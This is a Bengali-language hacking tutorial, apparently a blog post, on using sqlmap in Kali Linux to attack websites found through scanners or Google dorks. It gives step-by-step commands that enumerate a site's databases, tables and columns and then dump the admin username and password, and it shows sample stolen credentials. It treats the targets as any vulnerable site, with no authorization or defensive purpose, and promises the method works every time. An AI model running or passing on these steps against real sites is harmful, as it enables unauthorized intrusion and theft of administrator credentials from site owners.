Sqlmap দিয়ে SQL Injection করে বের করুন ওয়েবসাইটের এডমিনের Username নেম আর Password ! [Only for Kali Linux

আসসালামু আলাইকুম !! কেমন আছেন সবাই ? আজ আমরা শিখবো Sqlmap দিয়ে কিভাবে auto SQL injection করে ওয়েবসাইট এর ডাটাবেস থেকে এডমিন এর ইউজার নেম এবং পাসওয়ার্ড বের করতে হয় ! ওয়েবসাইট হ্যাকিং এর অন্যতম জনপ্রিয় পদ্ধতি হল SQL Injection ! আজকে আপনাদের দেখাবো Sqlmap এর কাজ ! যা কালি লিনাক্সে আগে থেকেই বিদ্যমান ! কোনো সাইট SQL Injection এর যোগ্য কিনা তা জানতে Kali Linux এর ক্ষেত্রে Vega,Power Fuzzar ব্যবহার করতে পারেন ! অথবা গুগল ডর্ক ব্যবহার করতে পারেন !! আচ্ছা ধরেন আপনি একটা ওয়েবসাইট পেয়েছেন যেটা SQL Injection এর যোগ্য ! ঊপরের সফটওয়্যার গুলু বলে দিবে আপনাকে যে ঐ ওয়েবসাইট এর কোন লিঙ্কটা Vulnerable ! তাহলে ঐ ওয়েবসাইট এর Link টা হবে এমন : http://www.yoursite.com /index.php?id=32 ! এখন আপনার কাজ হল কালি লিনাক্স ওপেন করে টার্মিনাল ওপেন করা ! প্রথমে আমরা ডাটাবেস বের করব তারপর টেবিল তারপর কলাম তারপর সেগুলু দেখব ডাম্প করার মাধ্যমে ! তাহলে আমরা টার্মিনালে লিখবঃ sqlmap -u http://www.yoursite.com/index.php?id=32--dbs তারপর আপনার কাছে কিছু জানতে চাইতে পারে ! ভালভাবে পড়ে দেখুন কি জানতে চাচ্ছে ! যদি না বুঝেন সমস্যা নাই ! লাইন এর লাস্টে দেখুন (Y/n) অথবা (y/N) এমন আসবে ! যেটা বড় হাতের হবে সেটা লিখুন ! উদাহরন ১ : Scan all directory (Y/n) Y বড় হাতের তাহলে Y লিখে Enter চাপুন ! উদাহরন ২ : Cancle Scane (y/N) N বড় হাতের তাহলে N লিখে Enter চাপুন ! কিছুক্ষন কাজ হবে ! তারপর আপনার সামনে হাজির হবে ঐ ওয়েবসাইট এর ডাটাবেস ! এমন: *information_schema *yoursite তারপর আমরা টার্মিনালে লিখবঃ sqlmap -u http://www.yoursite.com/index.php?id=32-D yoursite --tables ভেঙ্গে বলতে হবে ?? টেবিল পাবো এমন : user files admin email তারপর আমরা টার্মিনালে লিখবঃ sqlmap -u http://www.yoursite.com /index.php?id=32 -D yoursite -T admin --columns কলাম পাবো এমন : admin_username admin_password তারপর আমরা টার্মিনালে লিখবঃ sqlmap -u http://www.yoursite.com /index.php?id=32 -D yoursite -T admin -C admin_username --dump [ Username ] [ ] [ BOLOD ] [ ] একই ভাবে পাসওয়ার্ড বের করব : আমরা টার্মিনালে লিখবঃ sqlmap -u http://www.yoursite.com /index.php?id=32 -D yoursite -T admin -C admin_password --dump [ Password ] [ ] [ 123456 ] [ ] কারো প্রশ্ন থাকলে করতে পারেন ! আর অনেকেই বলবেন হাভিঝ দিয়ে ইজি ! কিন্তু হাভিঝ দিয়ে অনেক সাইট এর ডাটাবেস আসে না ঝামেলা করে ! [Note -- এটা একদম নতুনদের জন্য নয় ! আর ট্রাই না করে " কাজ করে না এই সেই " টিউমেন্ট করবেন না দয়া করে ! আগে ট্রাই করুন ১০০% কাজ করবে !]